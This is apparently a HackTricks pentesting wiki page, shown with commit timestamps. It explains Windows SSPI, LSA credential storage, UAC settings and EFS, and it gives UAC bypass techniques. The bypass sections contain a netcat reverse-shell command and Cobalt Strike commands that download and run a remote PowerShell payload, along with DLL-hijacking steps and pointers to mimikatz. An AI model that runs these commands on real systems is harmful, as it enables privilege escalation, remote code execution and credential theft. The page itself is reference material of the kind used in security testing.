hacktricks/windows-hardening/authentication-credentials-uac-and-efs.md

322 lines
23 KiB
Markdown
Raw Normal View History

2022-08-13 15:36:34 +00:00
# Authentication, Credentials, UAC and EFS
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
2022-09-30 10:43:59 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
2022-04-28 16:01:33 +00:00
</details>
2022-10-03 23:01:22 +00:00
![](<../.gitbook/assets/image (9) (1) (2).png>)
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-08-13 15:36:34 +00:00
## Security Support Provider Interface (SSPI)
Is the API that can be use to authenticate users.
The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate.
2022-08-13 15:36:34 +00:00
### Main SSPs
2022-04-05 22:24:52 +00:00
* **Kerberos**: The preferred one
* %windir%\Windows\System32\kerberos.dll
2022-04-05 22:24:52 +00:00
* **NTLMv1** and **NTLMv2**: Compatibility reasons
* %windir%\Windows\System32\msv1\_0.dll
2022-04-05 22:24:52 +00:00
* **Digest**: Web servers and LDAP, password in form of a MD5 hash
* %windir%\Windows\System32\Wdigest.dll
2022-04-05 22:24:52 +00:00
* **Schannel**: SSL and TLS
* %windir%\Windows\System32\Schannel.dll
2022-04-05 22:24:52 +00:00
* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)
* %windir%\Windows\System32\lsasrv.dll
2022-08-13 15:36:34 +00:00
#### The negotiation could offer several methods or only one.
2022-08-13 15:36:34 +00:00
## Local Security Authority (LSA)
2021-11-30 16:46:07 +00:00
The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
**LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
2022-08-13 15:36:34 +00:00
The **credentials** are **saved** inside the **process \_LSASS**\_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
2022-08-13 15:36:34 +00:00
## Credentials Storage
2022-08-13 15:36:34 +00:00
### Security Accounts Manager (SAM)
Local credentials are present in this file, the passwords are hashed.
2022-08-13 15:36:34 +00:00
### LSASS
We have talk about this. Different credentials are saved in the memory of this process.
2022-08-13 15:36:34 +00:00
### LSA secrets
LSA could save in disk some credentials:
* Password of the computer account of the Active Directory (unreachable domain controller).
* Passwords of the accounts of Windows services
* Passwords for scheduled tasks
* More (password of IIS applications...)
2022-08-13 15:36:34 +00:00
### NTDS.dit
It is the database of the Active Directory. It is only present in Domain Controllers.
2022-08-13 15:36:34 +00:00
### Credential Manager store
Allows browsers and other Windows applications to save credentials.
2022-10-03 23:01:22 +00:00
2022-09-30 10:43:59 +00:00
![](<../.gitbook/assets/image (9) (1) (2).png>)
2022-09-01 23:40:55 +00:00
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
2022-08-13 15:36:34 +00:00
## UAC
2022-10-03 22:58:50 +00:00
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. Applications have different `integrity` levels, and a program with a **high level** can perform tasks that **could potentially compromise the system**. When UAC is enabled, applications and tasks always **run under the security context of a non-administrator account** unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.
2022-10-03 22:58:50 +00:00
For more info about integrity levels:
{% content-ref url="windows-local-privilege-escalation/integrity-levels.md" %}
[integrity-levels.md](windows-local-privilege-escalation/integrity-levels.md)
{% endcontent-ref %}
2022-10-03 22:58:50 +00:00
When UAC is in place, an administrator user is given 2 tokens: a standard user key, to perform regular actions as regular level, and one with the admin privileges.
This [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) discusses how UAC works in great depth and includes the logon process, user experience, and UAC architecture. Administrators can use security policies to configure how UAC works specific to their organization at the local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:
| Group Policy Setting | Registry Key | Default Setting |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Disabled |
| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Disabled |
| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Enabled (default for home) Disabled (default for enterprise) |
| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Disabled |
| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Enabled |
| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Enabled |
| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Enabled |
| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | <p></p><p>Enabled</p> |
### UAC Bypass Theory
2021-11-30 16:46:07 +00:00
Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary has to be **signed by Microsoft** also.
2021-11-30 16:46:07 +00:00
Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**.
2021-11-30 16:46:07 +00:00
You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
2022-08-13 15:36:34 +00:00
### Check UAC
2022-10-03 22:58:50 +00:00
To confirm if UAC is enabled do:
```
2022-10-03 22:58:50 +00:00
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
```
If it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
Then, check **which level** is configured:
```
2022-10-03 22:58:50 +00:00
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
2022-10-03 22:58:50 +00:00
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5
```
* If **`0`** then, UAC won't prompt (like **disabled**)
* If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
* If **`2`** (**Always notify me**) UAC will always ask for confirmation to the administrator when he tries to execute something with high privileges (on Secure Desktop)
* If **`3`** like `1` but not necessary on Secure Desktop
* If **`4`** like `2` but not necessary on Secure Desktop
* if **`5`**(**default**) it will ask the administrator to confirm to run non Windows binaries with high privileges
2022-08-13 15:36:34 +00:00
Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\
If the value is **`0`**, then, only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them.
And, finally take a look at the value of the key **`FilterAdministratorToken`**\
If **`0`**(default), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
2022-08-13 15:36:34 +00:00
#### Summary
2022-08-13 15:36:34 +00:00
* If `EnableLUA=0` or **doesn't exist**, **no UAC for anyone**
2022-09-30 10:43:59 +00:00
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**
2022-10-03 22:58:50 +00:00
All this information can be gathered using the **metasploit** module: `post/windows/gather/win_privs`
You can also check the groups of your user and get the integrity level:
```
net user %username%
whoami /groups | findstr Level
```
2022-10-03 22:58:50 +00:00
## UAC bypass
2022-10-03 22:58:50 +00:00
{% hint style="info" %}
Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
2020-08-31 16:15:38 +00:00
{% endhint %}
2022-10-03 22:58:50 +00:00
The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.
2022-10-03 22:58:50 +00:00
It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**
2022-10-03 22:58:50 +00:00
### UAC disabled
2020-10-22 16:45:33 +00:00
2022-08-13 15:36:34 +00:00
If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
2020-10-22 16:45:33 +00:00
```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
2020-12-27 17:31:50 +00:00
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
2020-10-22 16:45:33 +00:00
```
2022-08-13 15:36:34 +00:00
#### UAC bypass with token duplication
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
2022-10-03 22:58:50 +00:00
### **Very** Basic UAC "bypass" (full file system access)
If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
{% hint style="warning" %}
**Looks like this trick isn't working anymore**
{% endhint %}
```bash
net use Z: \\127.0.0.1\c$
cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
### UAC bypass with cobalt strike
2022-08-13 15:36:34 +00:00
The Cobalt Strike techniques will only work if UAC is not set at it's max security level
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]
# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```
2022-10-03 22:58:50 +00:00
**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
### UAC bypass exploits
2022-10-03 22:58:50 +00:00
[**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like `Source\Akagi\outout\x64\Debug\Akagi.exe`) , you will need to know **which one you need.**\
2022-04-05 22:24:52 +00:00
You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
2022-10-03 22:58:50 +00:00
UACME has the **build version from which each technique started working**. You can search for a technique affecting your versions:
```
PS C:\> [environment]::OSVersion.Version
Major Minor Build Revision
----- ----- ----- --------
10 0 14393 0
```
Also, using [this](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) page you get the Windows release `1607` from the build versions.
2022-08-13 15:36:34 +00:00
#### More UAC bypass
2021-11-30 16:46:07 +00:00
**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
2021-11-30 16:46:07 +00:00
You can get using a **meterpreter** session. Migrate to a **process** that has the **Session** value equals to **1**:
![](<../.gitbook/assets/image (96).png>)
(_explorer.exe_ should works)
2022-08-13 15:36:34 +00:00
### Your own bypass - Basic UAC bypass methodology
If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](windows-local-privilege-escalation/dll-hijacking.md).
2021-11-30 16:46:07 +00:00
1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level).
2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**.
2021-11-30 16:46:07 +00:00
3. You probably will need to **write** the DLL inside some **protected paths** (like C:\Windows\System32) were you don't have writing permissions. You can bypass this using:
1. **wusa.exe**: Windows 7,8 and 8.1. It allows to extract the content of a CAB file inside protected paths (because this tool is executed from a high integrity level).
2. **IFileOperation**: Windows 10.
2021-11-30 16:46:07 +00:00
4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
2022-10-03 22:58:50 +00:00
### Another UAC bypass technique
2021-11-30 16:46:07 +00:00
Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
2022-08-13 15:36:34 +00:00
## EFS (Encrypted File System)
2022-08-13 15:36:34 +00:00
EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System).
2022-04-05 22:24:52 +00:00
Examples of files being decrypted without the user asking for it:
2022-04-05 22:24:52 +00:00
* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table).
* Encrypted files are copied over the network using the SMB/CIFS protocol, the files are decrypted before they are sent over the network.
2021-11-30 16:46:07 +00:00
The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work).
2022-08-13 15:36:34 +00:00
### Check EFS info
2021-11-30 16:46:07 +00:00
Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
2021-11-30 16:46:07 +00:00
Check **who** has **access** to the file using cipher /c \<file>\
You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
2022-08-13 15:36:34 +00:00
### Decrypting EFS files
2022-08-13 15:36:34 +00:00
#### Being Authority System
2021-11-30 16:46:07 +00:00
This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user.
2022-08-13 15:36:34 +00:00
#### Knowing the users password
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
2022-09-30 10:43:59 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
2022-04-28 16:01:33 +00:00
</details>
2022-09-01 23:40:55 +00:00
2022-09-30 10:43:59 +00:00
![](<../.gitbook/assets/image (9) (1) (2).png>)
2022-09-01 23:40:55 +00:00
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}